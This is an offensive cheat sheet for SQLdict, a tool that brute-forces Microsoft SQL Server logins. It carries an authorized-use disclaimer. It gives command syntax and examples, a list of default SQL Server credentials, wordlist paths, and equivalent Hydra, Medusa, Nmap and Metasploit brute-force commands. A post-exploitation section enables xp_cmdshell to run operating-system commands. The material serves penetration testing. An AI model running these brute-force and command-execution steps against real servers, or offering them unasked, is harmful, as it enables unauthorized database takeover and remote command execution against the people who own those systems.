SQLDICT
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
SQLdict is a dictionary-based password attack tool for Microsoft SQL Server. It performs brute force login attempts against SQL Server instances using a username and password wordlist.
BASIC USAGE#
sqldict <target> -u <user> -p <wordlist>
# Brute force SQL Server login
OPTIONS#
sqldict <target> # Target SQL Server IP sqldict -u <user> # Username to attack (default: sa) sqldict -p <wordlist> # Password wordlist file sqldict -P <port> # SQL Server port (default: 1433) sqldict -d <database> # Target database name sqldict -t <timeout> # Connection timeout
EXAMPLES#
# Attack SA account with wordlist sqldict 192.168.1.1 -u sa -p passwords.txt # Custom port sqldict 192.168.1.1 -u sa -p passwords.txt -P 1434 # Attack specific user account sqldict 192.168.1.1 -u dbadmin -p passwords.txt # With specific database sqldict 192.168.1.1 -u sa -p passwords.txt -d master
COMMON SQL SERVER CREDENTIALS#
# Username Password # sa (blank) # sa sa # sa password # sa sql # sa admin # sa 1234 # probe probe # admin admin # distributor_admin distributor_admin
PASSWORD WORDLISTS#
/usr/share/wordlists/rockyou.txt /usr/share/wordlists/metasploit/default_pass_for_services.txt /usr/share/seclists/Passwords/Common-Credentials/ /usr/share/seclists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt
ALTERNATIVE TOOLS#
# Hydra: hydra -l sa -P passwords.txt <target> mssql # Medusa: medusa -h <target> -u sa -P passwords.txt -M mssql # Nmap: nmap --script ms-sql-brute -p 1433 <target> # Metasploit: use auxiliary/scanner/mssql/mssql_login set RHOSTS <target> set USERNAME sa set PASS_FILE passwords.txt run
POST-EXPLOITATION#
# After finding credentials: # Connect with sqsh: sqsh -S <target> -U sa -P <password> # Enable xp_cmdshell: EXEC sp_configure 'xp_cmdshell', 1 RECONFIGURE # Execute OS commands: EXEC xp_cmdshell 'whoami'
NOTES#
- Windows-based tool (can run via Wine) - Account lockout policies may trigger - SA account is high-value target - Modern SQL Server enforces password policies - Consider timing between attempts - Use specific wordlists for SQL Server - Only for authorized penetration testing - Pair with nmap ms-sql-info for version detection